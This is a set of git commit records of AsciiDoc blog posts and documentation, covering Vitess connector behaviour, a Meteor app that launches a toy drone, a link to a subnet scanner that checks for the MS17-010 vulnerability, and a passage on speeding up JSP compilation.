Connect process that is running the connectors repeatedly tries to reconnect to the Kafka brokers. In other words, the connector tasks pause until a connection can be re-established, at which point the connectors resume exactly where they left off.\n\n[id=\"vitess-connector-is-stopped-for-a-duration\"]\n=== Connector is stopped for a duration\n\nIf the connector is gracefully stopped, the database can continue to be used. Any changes are recorded in the Vitess binlog. When the connector restarts, it resumes streaming changes where it left off. That is, it generates change event records for all database changes that were made while the connector was stopped.\n\nA properly configured Kafka cluster is able to handle massive throughput. Kafka Connect is written according to Kafka best practices, and given enough resources a Kafka Connect connector can also handle very large numbers of database change events. Because of this, after being stopped for a while, when a {prodname} connector restarts, it is very likely to catch up with the database changes that were made while it was stopped. How quickly this happens depends on the capabilities and performance of Kafka and the volume of changes being made to the data in Vitess.\n\n[id=\"limitations-with-earlier-vitess-versions\"]\n=== Limitations with earlier Vitess versions\n\n.Vitess 8.0.0\n\n* Due to a minor Vitess padding issue (which is fixed in Vitess 9.0.0), decimal values with a precision that is greater than or equal to 13 will cause extra whitespaces in front of the number. E.g. if the column type is `decimal(13,4)` in the table definition, the value `-1.2300` becomes `\"- 1.2300\"`, and the value `1.2300` becomes `\" 1.2300\"`.\n* Does not support the `JSON` column type.\n* VStream 8.0.0 doesn't provide additional metadata of permitted values for `ENUM` columns.\nTherefore, the Connector does not support the `ENUM` column type.\nThe index number (1-based) will be emitted instead of the enumeration value.\nE.g. `\"3\"` will be emitted as the value instead of `\"L\"` if the `ENUM` definition is `enum('S','M','L')`.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a60a5ba28ecf2d2d92813b2a4bbb117f6e33a915","subject":"Update 2015-08-31-Un-Sensit-Meteor-et-mon-Rolling-Spider-decolle.adoc","message":"Update 2015-08-31-Un-Sensit-Meteor-et-mon-Rolling-Spider-decolle.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2015-08-31-Un-Sensit-Meteor-et-mon-Rolling-Spider-decolle.adoc","new_file":"_posts\/2015-08-31-Un-Sensit-Meteor-et-mon-Rolling-Spider-decolle.adoc","new_contents":"= Un Sens'it, Meteor et mon Rolling Spider d\u00e9colle\n:hp-tags: Sensit, IoT, Sigfox, Meteor, Parrot, Rolling Spider\n:published_at: 2015-08-31\n:url-blogpost: http:\/\/anthonnyquerouil.fr\/2015\/08\/24\/Sensit-mon-petit-objet-connecte.html\n:url-rolling-spider: http:\/\/www.parrot.com\/fr\/produits\/rolling-spider\/\n:url-sensit: https:\/\/www.sensit.io\/\n\nComme vous l'avez peut-\u00eatre lu dans mon pr\u00e9c\u00e9dent billet \n{url-blogpost}, j'ai r\u00e9cemment fait l'acquisition d'un {url-sensit}[Sens'it]. \n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9440843\/9e9e12bc-4a72-11e5-9485-cc94a6735fbf.JPG[]\n\nJ'ai aussi depuis peu un {url-rolling-spider}[Rolling-spider] que je m'\u00e9tais procur\u00e9 dans le but de le controller avec un peu de code https:\/\/github.com\/ChrisTheBaron\/cylon-rolling-spider[JS] (c'est \u00e0 cause de http:\/\/twitter.com\/k33g_org[@k33g_org] tout \u00e7a). L'heure est venue de mixer le tout !\n\nimage::https:\/\/pbs.twimg.com\/media\/CNiIQfqWoAAhK9m.jpg[]\n\n== L'objectif\n\nL'objectif est plut\u00f4t simple, double cliquer sur le {url-sensit}[Sens'it] et faire d\u00e9coller le {url-rolling-spider}[Rolling-spider].\n\nPour ce faire, voici ce qu'il nous faut :\n\n* Un {url-sensit}[Sens'it],\n* Un Parrot Rolling Spider,\n* Un framework JS permettant de controller le spider (on utilisera https:\/\/github.com\/voodootikigod\/node-rolling-spider[node-rolling-spider] wrapper dans un package meteor https:\/\/atmospherejs.com\/anthonny\/rolling-spider[anthonny:rolling-spider]),\n* Un peu de Meteor pour lier le tout.\n\n\n== L'architecture\n\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9587833\/f979b92c-5024-11e5-9fbf-20a14b2594b8.png[]\n\n1. Le {url-sensit}[Sens'it] va transmettre un message sur le r\u00e9seau SIGFOX,\n2. Les serveurs SIGFOX vont communiquer aux serveurs AXIBLE qu'un message *button* a \u00e9t\u00e9 envoy\u00e9,\n3. AXIBLE va appel\u00e9 l'URL de Callback que nous aurons d\u00e9fini dans l'interface d'administration,\n4. Ce callback pointera sur une application *sensit.meteor.com* que nous aurons d\u00e9ploy\u00e9e au pr\u00e9alable,\n5. Cette derni\u00e8re enregistrera une trace de l'appel dans une collection Mongo,\n6. Notre application cliente \u00e9tablira une connexion DDP avec l'application *sensit.meteor.com*, et observera les changements effectu\u00e9s sur cette collection,\n7. Au premier changement d\u00e9tect\u00e9, on d\u00e9colle.\n\n== La remote-app : sensit.meteor.com\n\n=== D\u00e9finition de l'URL de callback\nDans l'interface {url-sensit}[Sens'it], nous allons sp\u00e9cifier une URL de callback pour les notifications de type *button*.\n\nPour rappel, ce callback est appel\u00e9 via un GET et peut recevoir en query param certaines valeurs (via des variables {{my_var}}) :\n\n* device_id\n* device_serial_number\n* sensor_id\n* mode\n* notification_type\n* data\n* date\n\nNous pouvons donc d\u00e9finir l'URL suivante :\n\n----\nhttp:\/\/sensit.meteor.com\/sensit-callback\/button?device_id={{device_id}}&device_serial_number={{device_serial_number}}&sensor_id={{sensor_id}}&mode={{mode}}¬ification_type={{notification_type}}&data={{data}}&date={{date}}\n----\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9629320\/160ef888-5172-11e5-895a-460308bc2a5c.png[]\n\n=== L'application Meteor\nNous cr\u00e9ons notre application *meteor* :\n[source, shell]\n----\nmeteor create remote-app\ncd remote-app\nmeteor remove autopublish insecure\nrm remote-app.*\nmkdir server\ntouch server\/main.js\n----\n\nPour la gestion des routes, on utilisera http:\/\/iron-meteor.github.io\/iron-router\/[iron-router] :\n[source, javascript]\n----\nmeteor add iron:router\n----\n\nCommen\u00e7ons par cr\u00e9er une collection `notification` qui aura pour but de stocker les diff\u00e9rentes notifications re\u00e7ues.\n\n[source, javascript]\n----\nNotification = new Meteor.Collection(\"notification\");\n----\n\nIl faut ensuite d\u00e9finir notre endpoint qui r\u00e9pondra \u00e0 l'appel du callback.\n\n[source, javascript]\n----\nRouter.route('\/sensit-callback\/:type', {where: 'server'})\n .get(function () {\n if (['temperature', 'motion', 'button'].indexOf(this.params.type) < 0)\n throw new Error('Invalid type');\n\n var notification = _.extend({type: this.params.type}, this.params.query, {data: JSON.parse(this.params.query.data)});\n\n Notification.insert(notification);\n this.response.end('notification ' + notification.type + ' saved\\n');\n });\n----\n\nNous d\u00e9finissons une route `\/sensit-callback\/:type` dans laquelle `:type` peut prendre une des valeurs suivantes `['temperature', 'motion', 'button']`. \n\nOn construit ensuite un objet `notification` \u00e0 partir du `type` et des queryParam (on force la conversion en JSON du param\u00e8tre `data` car c'est un objet JSON stringifi\u00e9).\n\nEnfin on ins\u00e8re notre `notification` en base et on r\u00e9pond en confirmant l'enregistrement.\n\nPour que les informations pr\u00e9sentes dans notre collection soient accessibles par notre \"client\", il faut les publier (au passage, on va g\u00e9rer les autres types) :\n\n[source, javascript]\n----\nMeteor.publish(\"remote-button\", function (argument) {\n return Notification.find({type: 'button'});\n});\nMeteor.publish(\"remote-temperature\", function (argument) {\n return Notification.find({type: 'temperature'});\n});\nMeteor.publish(\"remote-motion\", function (argument) {\n return Notification.find({type: 'motion'});\n});\n----\n\nLe code complet :\n[source, javascript, title=remote-app\/server\/main.js]\n----\nNotification = new Meteor.Collection(\"notification\");\n\nRouter.route('\/sensit-callback\/:type', {where: 'server'})\n .get(function () {\n if (['temperature', 'motion', 'button'].indexOf(this.params.type) < 0)\n throw new Error('Invalid type');\n\n var notification = _.extend({type: this.params.type}, this.params.query, {data: JSON.parse(this.params.query.data)});\n\n Notification.insert(notification);\n this.response.end('notification ' + notification.type + ' saved\\n');\n });\n\nMeteor.publish(\"remote-temperature\", function (argument) {\n return Notification.find({type: 'temperature'});\n});\nMeteor.publish(\"remote-motion\", function (argument) {\n return Notification.find({type: 'motion'});\n});\nMeteor.publish(\"remote-button\", function (argument) {\n return Notification.find({type: 'button'});\n});\n----\n\n=== Un peu de test\nOn d\u00e9marre l'application :\n[source, javascript]\n----\nmeteor\n----\n\nOn requ\u00eate l'url :\n----\nhttp:\/\/localhost:3000\/sensit-callback\/button?device_serial_number=ABCDE¬ification_type=generic_punctual&data=%7B%22first_name%22%3A%22Anthonny%22%2C%22sensit_name%22%3A%22%22%2C%22last_name%22%3A%22Querouil%22%2C%22device_id%22%3A%22ABCDE%22%7D&device_id=1234&sensor_id=5678&date=2015-09-01T17%3A37Z&mode=6\n----\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9629955\/06bdd084-5177-11e5-8e5b-1aa1478a6413.png[]\n\nLe service r\u00e9pond correctement, et notre `notification` est bien enregistr\u00e9e :\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9630035\/b0f0abee-5177-11e5-95dd-1dd622648fce.png[]\n\n=== Le d\u00e9ploiement\nL'application sera d\u00e9ploy\u00e9e sur l'URL *sensit.meteor.com* :\n\n[source, javascript]\n----\nmeteor deploy sensit.meteor.com\n----\n\nPour valider le bon d\u00e9ploiement, on peut reprendre le test effectu\u00e9 au pr\u00e9alable et le faire pointer sur notre \"production\" :\n----\nhttp:\/\/sensit.meteor.com\/sensit-callback\/button?device_serial_number=ABCDE¬ification_type=generic_punctual&data=%7B%22first_name%22%3A%22Anthonny%22%2C%22sensit_name%22%3A%22%22%2C%22last_name%22%3A%22Querouil%22%2C%22device_id%22%3A%22ABCDE%22%7D&device_id=1234&sensor_id=5678&date=2015-09-01T17%3A37Z&mode=6\n----\n\nEnfin, on v\u00e9rifie que la `notification` est bien pr\u00e9sente en base :\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9630272\/66e493a6-5179-11e5-9230-36ecf85d83e1.png[]\n\n== La local-app : sensit-meteor-rs\n\nNous avons d\u00e9sormais un *backend* qui prend en compte les diff\u00e9rentes notifications, il nous faut maintenant une application qui tournera *localement* et qui r\u00e9agira aux changements qui surviennent dans le backend.\n\n\n=== L'application\n\n[source,shell]\n----\nmeteor create local-app\ncd local-app\nmeteor remove autopublish insecure\nrm local-app.*\nmkdir server\ntouch server\/main.js\n----\n\nNous allons initier une connexion https:\/\/www.meteor.com\/ddp[DDP] avec notre *backend* et \u00e9couter les changements qui sont faits sur la collection `notification`. \nPour chaque notification ajout\u00e9e dans cette collection que nous appellerons `RemoteNotification`, nous ajouterons une copie dans notre collection *locale* `Notification` :\n\n[source, javascript]\n----\n\/\/ D\u00e9claration de la connexion\nvar remote = DDP.connect('http:\/\/sensit.meteor.com\/');\nvar RemoteNotification = new Meteor.Collection('notification', { connection: remote });\nremote.subscribe('remote-button');\n\n\/\/ On \u00e9coute les changements effectu\u00e9s sur la collection en Remote\nRemoteNotification.find().observe({\n added: function(notification) {\n console.log('-- remote item added --');\n \/\/ On upsert dans la collection de Notification locale\n Notification.upsert({notification._id}, {$set: notification});\n }\n});\n----\n\n\nIl ne nous reste plus qu'\u00e0 faire d\u00e9coller le spider lorsqu'une `notification` est ajout\u00e9e en local :\n\n[source, javascript]\n----\nvar rollingSpider = new RollingSpider();\n\nrollingSpider.connect(Meteor.bindEnvironment(function () {\n rollingSpider.setup(Meteor.bindEnvironment(function () {\n rollingSpider.flatTrim();\n rollingSpider.startPing();\n rollingSpider.flatTrim();\n\n \/\/ On observe la collection Notification, au premier ajout on decolle !\n Notification.find().observe({\n added: function (notification) {\n rollingSpider.takeOff();\n rollingSpider.flatTrim();\n }\n });\n }));\n}));\n----\n\nLe code complet :\n[source, javascript, title=local-app\/server\/main.js]\n----\nvar Notification = new Meteor.Collection(\"notification\");\nvar remote = DDP.connect('http:\/\/sensit.meteor.com\/');\nvar RemoteNotification = new Meteor.Collection('notification', { connection: remote });\nvar isFlying = false;\n\n\nRemoteNotification.find().observe({\n added: function(notification) {\n console.log('-- remote item --');\n console.log(notification);\n Notification.upsert({_id: notification._id}, {$set: notification});\n }\n});\nremote.subscribe('remote-button');\n\nrollingSpider.connect(Meteor.bindEnvironment(function () {\n rollingSpider.setup(Meteor.bindEnvironment(function () {\n rollingSpider.flatTrim();\n rollingSpider.startPing();\n rollingSpider.flatTrim();\n\n Notification.find().observe({\n added: function (notification) {\n if (!isFlying) {\n isFlying = true;\n rollingSpider.takeOff();\n rollingSpider.flatTrim();\n }\n }\n });\n }));\n}));\n----\n\n\n=== D\u00e9collage !\n\nvideo::8DY4bsKOm5g[youtube]\n\n== Conclusion\n\nCe billet est l'occasion de mettre en avant la connexion entre deux applications https:\/\/www.meteor.com[Meteor] via le protocole https:\/\/www.meteor.com\/ddp[DDP] et de vous montrer qu'avec du javascript, on se marre bien (en tout cas, c'est vrai pour moi :) ).\n\nSi vous avez des projets similaires, n'h\u00e9sitez pas \u00e0 m'en faire part, ce sera un plaisir d'\u00e9changer dessus.\n","old_contents":"= Un Sens'it, Meteor et Rolling Spider d\u00e9colle\n:hp-tags: Sensit, IoT, Sigfox, Meteor, Parrot, Rolling Spider\n:published_at: 2015-08-31\n:url-blogpost: http:\/\/anthonnyquerouil.fr\/2015\/08\/24\/Sensit-mon-petit-objet-connecte.html\n:url-rolling-spider: http:\/\/www.parrot.com\/fr\/produits\/rolling-spider\/\n:url-sensit: https:\/\/www.sensit.io\/\n\nComme vous l'avez peut-\u00eatre lu dans mon pr\u00e9c\u00e9dent billet \n{url-blogpost}, j'ai r\u00e9cemment fait l'acquisition d'un {url-sensit}[Sens'it]. \n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9440843\/9e9e12bc-4a72-11e5-9485-cc94a6735fbf.JPG[]\n\nJ'ai aussi depuis peu un {url-rolling-spider}[Rolling-spider] que je m'\u00e9tais procur\u00e9 dans le but de le controller avec un peu de code https:\/\/github.com\/ChrisTheBaron\/cylon-rolling-spider[JS] (c'est \u00e0 cause de http:\/\/twitter.com\/k33g_org[@k33g_org] tout \u00e7a). L'heure est venue de mixer le tout !\n\nimage::https:\/\/pbs.twimg.com\/media\/CNiIQfqWoAAhK9m.jpg[]\n\n== L'objectif\n\nL'objectif est plut\u00f4t simple, double cliquer sur le {url-sensit}[Sens'it] et faire d\u00e9coller le {url-rolling-spider}[Rolling-spider].\n\nPour ce faire, voici ce qu'il nous faut :\n\n* Un {url-sensit}[Sens'it],\n* Un Parrot Rolling Spider,\n* Un framework JS permettant de controller le spider (on utilisera https:\/\/github.com\/voodootikigod\/node-rolling-spider[node-rolling-spider] wrapper dans un package meteor https:\/\/atmospherejs.com\/anthonny\/rolling-spider[anthonny:rolling-spider]),\n* Un peu de Meteor pour lier le tout.\n\n\n== L'architecture\n\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9587833\/f979b92c-5024-11e5-9fbf-20a14b2594b8.png[]\n\n1. Le {url-sensit}[Sens'it] va transmettre un message sur le r\u00e9seau SIGFOX,\n2. Les serveurs SIGFOX vont communiquer aux serveurs AXIBLE qu'un message *button* a \u00e9t\u00e9 envoy\u00e9,\n3. AXIBLE va appel\u00e9 l'URL de Callback que nous aurons d\u00e9fini dans l'interface d'administration,\n4. Ce callback pointera sur une application *sensit.meteor.com* que nous aurons d\u00e9ploy\u00e9e au pr\u00e9alable,\n5. Cette derni\u00e8re enregistrera une trace de l'appel dans une collection Mongo,\n6. Notre application cliente \u00e9tablira une connexion DDP avec l'application *sensit.meteor.com*, et observera les changements effectu\u00e9s sur cette collection,\n7. Au premier changement d\u00e9tect\u00e9, on d\u00e9colle.\n\n== La remote-app : sensit.meteor.com\n\n=== D\u00e9finition de l'URL de callback\nDans l'interface {url-sensit}[Sens'it], nous allons sp\u00e9cifier une URL de callback pour les notifications de type *button*.\n\nPour rappel, ce callback est appel\u00e9 via un GET et peut recevoir en query param certaines valeurs (via des variables {{my_var}}) :\n\n* device_id\n* device_serial_number\n* sensor_id\n* mode\n* notification_type\n* data\n* date\n\nNous pouvons donc d\u00e9finir l'URL suivante :\n\n----\nhttp:\/\/sensit.meteor.com\/sensit-callback\/button?device_id={{device_id}}&device_serial_number={{device_serial_number}}&sensor_id={{sensor_id}}&mode={{mode}}¬ification_type={{notification_type}}&data={{data}}&date={{date}}\n----\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9629320\/160ef888-5172-11e5-895a-460308bc2a5c.png[]\n\n=== L'application Meteor\nNous cr\u00e9ons notre application *meteor* :\n[source, shell]\n----\nmeteor create remote-app\ncd remote-app\nmeteor remove autopublish insecure\nrm remote-app.*\nmkdir server\ntouch server\/main.js\n----\n\nPour la gestion des routes, on utilisera http:\/\/iron-meteor.github.io\/iron-router\/[iron-router] :\n[source, javascript]\n----\nmeteor add iron:router\n----\n\nCommen\u00e7ons par cr\u00e9er une collection `notification` qui aura pour but de stocker les diff\u00e9rentes notifications re\u00e7ues.\n\n[source, javascript]\n----\nNotification = new Meteor.Collection(\"notification\");\n----\n\nIl faut ensuite d\u00e9finir notre endpoint qui r\u00e9pondra \u00e0 l'appel du callback.\n\n[source, javascript]\n----\nRouter.route('\/sensit-callback\/:type', {where: 'server'})\n .get(function () {\n if (['temperature', 'motion', 'button'].indexOf(this.params.type) < 0)\n throw new Error('Invalid type');\n\n var notification = _.extend({type: this.params.type}, this.params.query, {data: JSON.parse(this.params.query.data)});\n\n Notification.insert(notification);\n this.response.end('notification ' + notification.type + ' saved\\n');\n });\n----\n\nNous d\u00e9finissons une route `\/sensit-callback\/:type` dans laquelle `:type` peut prendre une des valeurs suivantes `['temperature', 'motion', 'button']`. \n\nOn construit ensuite un objet `notification` \u00e0 partir du `type` et des queryParam (on force la conversion en JSON du param\u00e8tre `data` car c'est un objet JSON stringifi\u00e9).\n\nEnfin on ins\u00e8re notre `notification` en base et on r\u00e9pond en confirmant l'enregistrement.\n\nPour que les informations pr\u00e9sentes dans notre collection soient accessibles par notre \"client\", il faut les publier (au passage, on va g\u00e9rer les autres types) :\n\n[source, javascript]\n----\nMeteor.publish(\"remote-button\", function (argument) {\n return Notification.find({type: 'button'});\n});\nMeteor.publish(\"remote-temperature\", function (argument) {\n return Notification.find({type: 'temperature'});\n});\nMeteor.publish(\"remote-motion\", function (argument) {\n return Notification.find({type: 'motion'});\n});\n----\n\nLe code complet :\n[source, javascript, title=remote-app\/server\/main.js]\n----\nNotification = new Meteor.Collection(\"notification\");\n\nRouter.route('\/sensit-callback\/:type', {where: 'server'})\n .get(function () {\n if (['temperature', 'motion', 'button'].indexOf(this.params.type) < 0)\n throw new Error('Invalid type');\n\n var notification = _.extend({type: this.params.type}, this.params.query, {data: JSON.parse(this.params.query.data)});\n\n Notification.insert(notification);\n this.response.end('notification ' + notification.type + ' saved\\n');\n });\n\nMeteor.publish(\"remote-temperature\", function (argument) {\n return Notification.find({type: 'temperature'});\n});\nMeteor.publish(\"remote-motion\", function (argument) {\n return Notification.find({type: 'motion'});\n});\nMeteor.publish(\"remote-button\", function (argument) {\n return Notification.find({type: 'button'});\n});\n----\n\n=== Un peu de test\nOn d\u00e9marre l'application :\n[source, javascript]\n----\nmeteor\n----\n\nOn requ\u00eate l'url :\n----\nhttp:\/\/localhost:3000\/sensit-callback\/button?device_serial_number=ABCDE¬ification_type=generic_punctual&data=%7B%22first_name%22%3A%22Anthonny%22%2C%22sensit_name%22%3A%22%22%2C%22last_name%22%3A%22Querouil%22%2C%22device_id%22%3A%22ABCDE%22%7D&device_id=1234&sensor_id=5678&date=2015-09-01T17%3A37Z&mode=6\n----\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9629955\/06bdd084-5177-11e5-8e5b-1aa1478a6413.png[]\n\nLe service r\u00e9pond correctement, et notre `notification` est bien enregistr\u00e9e :\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9630035\/b0f0abee-5177-11e5-95dd-1dd622648fce.png[]\n\n=== Le d\u00e9ploiement\nL'application sera d\u00e9ploy\u00e9e sur l'URL *sensit.meteor.com* :\n\n[source, javascript]\n----\nmeteor deploy sensit.meteor.com\n----\n\nPour valider le bon d\u00e9ploiement, on peut reprendre le test effectu\u00e9 au pr\u00e9alable et le faire pointer sur notre \"production\" :\n----\nhttp:\/\/sensit.meteor.com\/sensit-callback\/button?device_serial_number=ABCDE¬ification_type=generic_punctual&data=%7B%22first_name%22%3A%22Anthonny%22%2C%22sensit_name%22%3A%22%22%2C%22last_name%22%3A%22Querouil%22%2C%22device_id%22%3A%22ABCDE%22%7D&device_id=1234&sensor_id=5678&date=2015-09-01T17%3A37Z&mode=6\n----\n\nEnfin, on v\u00e9rifie que la `notification` est bien pr\u00e9sente en base :\n\nimage::https:\/\/cloud.githubusercontent.com\/assets\/2006548\/9630272\/66e493a6-5179-11e5-9230-36ecf85d83e1.png[]\n\n== La local-app : sensit-meteor-rs\n\nNous avons d\u00e9sormais un *backend* qui prend en compte les diff\u00e9rentes notifications, il nous faut maintenant une application qui tournera *localement* et qui r\u00e9agira aux changements qui surviennent dans le backend.\n\n\n=== L'application\n\n[source,shell]\n----\nmeteor create local-app\ncd local-app\nmeteor remove autopublish insecure\nrm local-app.*\nmkdir server\ntouch server\/main.js\n----\n\nNous allons initier une connexion https:\/\/www.meteor.com\/ddp[DDP] avec notre *backend* et \u00e9couter les changements qui sont faits sur la collection `notification`. \nPour chaque notification ajout\u00e9e dans cette collection que nous appellerons `RemoteNotification`, nous ajouterons une copie dans notre collection *locale* `Notification` :\n\n[source, javascript]\n----\n\/\/ D\u00e9claration de la connexion\nvar remote = DDP.connect('http:\/\/sensit.meteor.com\/');\nvar RemoteNotification = new Meteor.Collection('notification', { connection: remote });\nremote.subscribe('remote-button');\n\n\/\/ On \u00e9coute les changements effectu\u00e9s sur la collection en Remote\nRemoteNotification.find().observe({\n added: function(notification) {\n console.log('-- remote item added --');\n \/\/ On upsert dans la collection de Notification locale\n Notification.upsert({notification._id}, {$set: notification});\n }\n});\n----\n\n\nIl ne nous reste plus qu'\u00e0 faire d\u00e9coller le spider lorsqu'une `notification` est ajout\u00e9e en local :\n\n[source, javascript]\n----\nvar rollingSpider = new RollingSpider();\n\nrollingSpider.connect(Meteor.bindEnvironment(function () {\n rollingSpider.setup(Meteor.bindEnvironment(function () {\n rollingSpider.flatTrim();\n rollingSpider.startPing();\n rollingSpider.flatTrim();\n\n \/\/ On observe la collection Notification, au premier ajout on decolle !\n Notification.find().observe({\n added: function (notification) {\n rollingSpider.takeOff();\n rollingSpider.flatTrim();\n }\n });\n }));\n}));\n----\n\nLe code complet :\n[source, javascript, title=local-app\/server\/main.js]\n----\nvar Notification = new Meteor.Collection(\"notification\");\nvar remote = DDP.connect('http:\/\/sensit.meteor.com\/');\nvar RemoteNotification = new Meteor.Collection('notification', { connection: remote });\nvar isFlying = false;\n\n\nRemoteNotification.find().observe({\n added: function(notification) {\n console.log('-- remote item --');\n console.log(notification);\n Notification.upsert({_id: notification._id}, {$set: notification});\n }\n});\nremote.subscribe('remote-button');\n\nrollingSpider.connect(Meteor.bindEnvironment(function () {\n rollingSpider.setup(Meteor.bindEnvironment(function () {\n rollingSpider.flatTrim();\n rollingSpider.startPing();\n rollingSpider.flatTrim();\n\n Notification.find().observe({\n added: function (notification) {\n if (!isFlying) {\n isFlying = true;\n rollingSpider.takeOff();\n rollingSpider.flatTrim();\n }\n }\n });\n }));\n}));\n----\n\n\n=== D\u00e9collage !\n\nvideo::8DY4bsKOm5g[youtube]\n\n== Conclusion\n\nCe billet est l'occasion de mettre en avant la connexion entre deux applications https:\/\/www.meteor.com[Meteor] via le protocole https:\/\/www.meteor.com\/ddp[DDP] et de vous montrer qu'avec du javascript, on se marre bien (en tout cas, c'est vrai pour moi :) ).\n\nSi vous avez des projets similaires, n'h\u00e9sitez pas \u00e0 m'en faire part, ce sera un plaisir d'\u00e9changer dessus.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f716dd55f0fd6d5573d50eb23e6eef6a1dc63480","subject":"Update 2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","message":"Update 2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","repos":"topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io,topranks\/topranks.github.io","old_file":"_posts\/2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","new_file":"_posts\/2017-05-14-Scan-subnets-for-Microsoft-SM-B1-Vulnerability.adoc","new_contents":"= Scan subnets for Microsoft SMBv1 Vulnerability\n:hp-tags: Security, Python, Ransomeware, SMBv1, Eternalblue, MS17-010, Networking, Wanna Decryptor\n\nimage::\/images\/rezsez.jpg[rezsez]\n\nI found a great tool by https:\/\/github.com\/RiskSense-Ops\/MS17-010[RiskSense] to check if a Windows machine is vulnerable to the DoublePulsar \/ MS17-010 exploit (currently making headlines due to the http:\/\/www.bbc.com\/news\/technology-39913630[WannaCry ransomware].)\n\nThe tool is great, however it only checks a single IP address, so I forked and made a quick modification so it will scan entire subnets, expressed in CIDR notation. You can get it here:\n\nhttps:\/\/github.com\/topranks\/MS17-010_SUBNET\n\n\n","old_contents":"= Scan subnets for Microsoft SMBv1 Vulnerability\n:hp-tags: Security, Python, Ransomeware, SMBv1, Eternalblue, MS17-010, Networking, Wanna Decryptor\n\nimage::\/images\/rezsez.jpg[rezsez]\n\nI found a great tool by https:\/\/github.com\/RiskSense-Ops\/MS17-010[RiskSense] to check if a Windows machine is vulnerable to the DoublePulsar \/ MS17-010 exploit (currently making headlines due to the http:\/\/www.bbc.com\/news\/technology-39913630[WanaCrypt ransomware].)\n\nThe tool is great, however it only checks a single IP address, so I forked and made a quick modification so it will scan entire subnets, expressed in CIDR notation. You can get it here:\n\nhttps:\/\/github.com\/topranks\/MS17-010_SUBNET\n\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"ffa118026746ca28cf6b1f5378435f230ec117c8","subject":"Update 2016-12-03-How-to-compile-J-S-P-with-Tomcat-and-Maven-faster.adoc","message":"Update 2016-12-03-How-to-compile-J-S-P-with-Tomcat-and-Maven-faster.adoc","repos":"tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io","old_file":"_posts\/2016-12-03-How-to-compile-J-S-P-with-Tomcat-and-Maven-faster.adoc","new_file":"_posts\/2016-12-03-How-to-compile-J-S-P-with-Tomcat-and-Maven-faster.adoc","new_contents":":hp-tags: Tomcat JSP Maven\n\n= How to compile JSP with Tomcat and Maven faster\n\nWhen I must pre-compile JSP with tomcat, it's usually pain because it takes a lot of time.\nLet's see How compile this faster.\n\n== How to compile JSP\n\nIf I must compile for tomcat, I usually take this Maven plugin : https:\/\/github.com\/leonardehrenfried\/jspc-maven-plugin\nI take this plugin because I think it's pretty simple, and it give availabilty to add includes\/excludes of jsp.\nThis Maven config to the job in War project : \n\n[source,xml]\n====\n<web-app *metadata-complete=\"true\"*>\n\nTODO\n\n<\/web-app>\n====\n\n== Some problems of this plugin\n\nIf we have many jsp (> 500) the plugin can take lot of time to compile all files. (see the benchmark after)\nThe other problem is this plugin will stop and fail at the first jsp who contains error. \nAnd even at the first error in the jsp! If a jsp contains 5 errors, we must run 5 times the plugin to discover all.\nSo if a big project contains multiples errors, we must run may times the plugin and so many times the full compilation of all jsp.\n\n== First fix : performance\n\nIn order to compile a big project faster, I propose different things\n\n=== Give all jsp to Jasper JSPC\n\nIn version 1.1.0 of the plugin, it takes all of the jsp and call execute JSPC for each of them.\nThis is the code : \n\n[source,java]\n====\nfor (String fileName : jspFiles) {\n\tjspc.setJspFiles(fileName);\n\tgetLog().info(\"Compiling \" + fileName);\n\tjspc.execute();\n}\n\n====\n\nMaybe it's an optimization with Tomcat 6.X, but I think with Tomcat 8.X it's slower than giving all JSP directly to JSPC.execute();\nSee pull request TODO to fix this.\n\n=== Execute compilation in parallel\n\nTo compile faster we need to compile in parallel.\nIndeed when we launch JavaMissionControl for example, we see the CPU is 20%-30% usage when compiling.\nTo increase CPU usage, we need to execute jspc in different thread.\nSee pull request TODO to add this feature.\n\n=== Benchmark\n\nI made a little benchmark with two projects : one with 400 jsp and one with 3000 jsp.\nI test this on HP ZBook i7 Windows 7.\n\n* 400 jsp\n\n|===\n| |Time |Java Heap |CPU\n\n|out of the box 1.1.0\n|50s\n|1.3Gb\n|20%-30%\n\n|Giving all jsp to jspc.execute\n|30sec\n|1.1Gb\n|20%-30%\n\n|With 2 threads\n|21s\n|1.35Gb\n|60%\n\n|With 4 threads\n|17s\n|1.35Gb\n|90%\n|===","old_contents":":hp-tags: Tomcat JSP Maven\n\n= How to compile JSP with Tomcat and Maven faster\n\nWhen I must pre-compile JSP with tomcat, it's usually pain because it takes a lot of time.\nLet's see How compile this faster.\n\n== How to compile JSP\n\nIf I must compile for tomcat, I usually take this Maven plugin : https:\/\/github.com\/leonardehrenfried\/jspc-maven-plugin\nI take this plugin because I think it's pretty simple, and it give availabilty to add includes\/excludes of jsp.\nThis Maven config to the job in War project : \n\n[source,xml]\n====\n<web-app *metadata-complete=\"true\"*>\n\nTODO\n\n<\/web-app>\n====\n\n== Some problems of this plugin\n\nIf we have many jsp (> 500) the plugin can take lot of time to compile all files. (see the benchmark after)\nThe other problem is this plugin will stop and fail at the first jsp who contains error. \nAnd even at the first error in the jsp! If a jsp contains 5 errors, we must run 5 times the plugin to discover all.\nSo if a big project contains multiples errors, we must run may times the plugin and so many times the full compilation of all jsp.\n\n== First fix : performance\n\nIn order to compile a big project faster, I propose different things\n\n=== Give all jsp to Jasper 